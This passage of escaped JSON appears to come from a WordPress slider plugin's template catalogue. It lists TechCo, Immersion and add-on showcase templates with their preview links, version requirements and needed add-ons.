modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"163\":{\"id\":\"175\",\"title\":\"TechCo Header\",\"alias\":\"techco-header\",\"zip\":\"packs\\/techco-header.zip\",\"uid\":\"fb574d1376de9b1e408c91f51e6497d7\",\"img\":\"techco-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"164\":{\"id\":\"176\",\"title\":\"TechCo About\",\"alias\":\"techco-about\",\"zip\":\"packs\\/techco-about.zip\",\"uid\":\"ba216da8231e55118d87e37d2358812c\",\"img\":\"techco-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"165\":{\"id\":\"177\",\"title\":\"TechCo Services\",\"alias\":\"techco-services\",\"zip\":\"packs\\/techco-services.zip\",\"uid\":\"ef4a8ddbb5e1136133f7bc1227248e22\",\"img\":\"techco-services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"166\":{\"id\":\"178\",\"title\":\"TechCo Video\",\"alias\":\"techco-video\",\"zip\":\"packs\\/techco-video.zip\",\"uid\":\"d7bb92281d05f39f9bc9eca71f90e402\",\"img\":\"techco-video\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"167\":{\"id\":\"179\",\"title\":\"TechCo Prices\",\"alias\":\"techco-prices\",\"zip\":\"packs\\/techco-prices.zip\",\"uid\":\"6291f404efbea12bb181352aba71ef11\",\"img\":\"techco-prices\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"168\":{\"id\":\"180\",\"title\":\"TechCo Testimonials\",\"alias\":\"techco-testimonials\",\"zip\":\"packs\\/techco-testimonials.zip\",\"uid\":\"3460bd51f6b80599266fecb7fbb918be\",\"img\":\"techco-testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"169\":{\"id\":\"181\",\"title\":\"TechCo Footer\",\"alias\":\"techco-footer\",\"zip\":\"packs\\/techco-footer.zip\",\"uid\":\"640abcd549137520461a4a71ff758a3b\",\"img\":\"techco-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/techco-one-page-wordpress-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=techco-one-page-wordpress-theme\",\"version\":\"1.0.2\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"TechCo One-Pager\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"9\",\"installed\":false},\"170\":{\"id\":\"182\",\"title\":\"Live Weather\",\"alias\":\"weather\",\"zip\":\"weather.zip\",\"uid\":\"aab92e69374e4c7b8c6741fe02e574b9\",\"img\":\"weather\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-live-weather-add-on\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-live-weather-add-on\",\"version\":\"1.0.3\",\"required\":\"5.4.5.2\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Showcasing our weather add-on, this slider show a different cities temperatures and forecast on each slide.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-weather-addon\\\\\\/revslider-weather-addon.php\\\",\\\"name\\\":\\\"Live Weather AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"171\":{\"id\":\"183\",\"title\":\"360 Panorama Tour\",\"alias\":\"360panorama\",\"zip\":\"360panorama.zip\",\"uid\":\"332720fdacdbb38f65e8327a2a96c52d\",\"img\":\"360panorama\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/360-degree-real-estate-virtual-tour\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=360-degree-real-estate-virtual-tour\",\"version\":\"1.0.0\",\"required\":\"5.4.5.2\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">An example template for our Panorama 360 tour add-on, created for the real estate market.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-panorama-addon\\\\\\/revslider-panorama-addon.php\\\",\\\"name\\\":\\\"Panorama AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"172\":{\"id\":\"184\",\"title\":\"Duotone Add-on\",\"alias\":\"duotone-add-on\",\"zip\":\"duotone-add-on.zip\",\"uid\":\"a428c6f363b3146e96d20a6f44958922\",\"img\":\"duotone-add-on\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-duotone-effect-add-on\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-duotone-effect-add-on\",\"version\":\"1.0.0\",\"required\":\"5.4.6\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This example template showcases 3 of the 30 Duotone filters available in our brand new Duotone Add-On.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-duotonefilters-addon\\\\\\/revslider-duotonefilters-addon.php\\\",\\\"name\\\":\\\"Duotone AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"173\":{\"id\":\"185\",\"title\":\"Reveal Add-on\",\"alias\":\"reveal-add-on\",\"zip\":\"reveal-add-on.zip\",\"uid\":\"7fa7525d8ff7fa7365cb98a437e88e32\",\"img\":\"reveal-add-on\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/wordpress-content-reveal-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-content-reveal-effect\",\"version\":\"1.0.0\",\"required\":\"5.4.6\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">An example template that uses our Reveal Add-On, which adds 14 new preloaders combined with reveal loading effects for any slider or hero.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"193\":{\"id\":\"211\",\"title\":\"Immersion One Page\",\"alias\":\"immersion-one-page-package\",\"zip\":\"\",\"uid\":\"immersion-one-page-package\",\"img\":\"packages\\/immersion_overview.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/immersion-wordpress-one-page-theme-2018\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=immersion-wordpress-one-page-theme-2018\",\"version\":\"1.0.0\",\"required\":\"5.4.6\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-slicey-addon\\\\\\/revslider-slicey-addon.php\\\",\\\"name\\\":\\\"Background Slicey AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Immersion One Page\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"10\",\"installed\":false},\"194\":{\"id\":\"212\",\"title\":\"Immersion Header\",\"alias\":\"immersion_header\",\"zip\":\"packs\\/immersion_header.zip\",\"uid\":\"853da51256308b341ecd030bd4883229\",\"img\":\"immersion_header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/immersion-wordpress-one-page-theme-2018\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=immersion-wordpress-one-page-theme-2018\",\"version\":\"1.0.0\",\"required\":\"5.4.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Immersion One Page\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"10\",\"installed\":false},\"195\":{\"id\":\"213\",\"title\":\"Immersion Mountains\",\"alias\":\"immersion-mountains\",\"zip\":\"packs\\/immersion-mountains.zip\",\"uid\":\"817167eb3fe22b7e065ba210cbe6d53c\",\"img\":\"immersion-mountains\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/immersion-wordpress-one-page-theme-2018\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=immersion-wordpress-one-page-theme-2018\",\"version\":\"1.0.0\",\"required\":\"5.4.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-slicey-addon\\\\\\/revslider-slicey-addon.php\\\",\\\"name\\\":\\\"Background Slicey AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Immersion One Page\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"10\",\"installed\":false},\"196\":{\"id\":\"214\",\"title\":\"Immersion Product\",\"alias\":\"immersion-product\",\"zip\":\"packs\\/immersion-product.zip\",\"uid\":\"64134f263484d2bbcd7ef088ffbbfb4b\",\"img\":\"immersion-product\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/immersion-wordpress-one-page-theme-2018\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=immersion-wordpress-one-page-theme-2018\",\"version\":\"1.0.0\",\"required\":\"5.4.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Immersion One Page\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"10\",\"installed\":false},\"197\":{\"id\":\"215\",\"title\":\"Immersion Design\",\"alias\":\"immersion-design\",\"zip\":\"packs\\/immersion-design.zip\",\"uid\":\"91e1d77c1a2826438763804f4d02bc26\",\"img\":\"immersion-design\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/immersion-wordpress-one-page-theme-2018\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=immersion-wordpress-one-page-theme-2018\",\"version\":\"1.0.0\",\"required\":\"5.4.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Immersion One Page\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"10\",\"installed\":false},\"198\":{\"id\":\"216\",\"title\":\"Immersion Phototgraphy\",\"alias\":\"immersion-photography\",\"zip\":\"packs\\/immersion-photography.zip\",\"uid\":\"e3ddf0c577b09740f5cbf2e38ffd684d\",\"img\":\"immersion-photography\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/immersion-wordpress-one-page-theme-2018\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=immersion-wordpress-one-page-theme-2018\",\"version\":\"1.0.0\",\"required\":\"5.4.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Immersion One Page\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"10\",\"installed\":false},\"199\":{\"id\":\"217\",\"title\":\"Immersion 